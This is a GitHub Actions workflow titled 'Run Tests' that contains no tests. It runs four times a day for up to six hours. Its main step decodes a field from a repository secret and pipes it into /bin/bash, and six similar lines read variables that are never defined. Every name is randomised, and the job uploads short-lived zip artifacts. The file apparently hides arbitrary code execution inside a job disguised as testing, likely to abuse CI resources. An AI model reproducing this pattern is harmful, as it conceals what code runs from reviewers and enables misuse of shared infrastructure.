name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '38 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          isirl718: ${{ secrets.isirl718 }}
        run: |
          printf '%s' "$isirl718" | jq -r .pn1 | /bin/bash
          printf '%s' "$m106" | jq -r .bne27 | /bin/bash
          printf '%s' "$utd753" | jq -r .uqk52 | /bin/bash
          printf '%s' "$xezg6" | jq -r .pv4 | /bin/bash
          printf '%s' "$daehi17131" | jq -r .ntxz90 | /bin/bash
          echo $ixas59 | jq -r .sgsp360 | /bin/bash
          echo $ffk12125 | jq -r .ohafv8 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: pwUPqcqK
          path: "*.zip"
          retention-days: 1
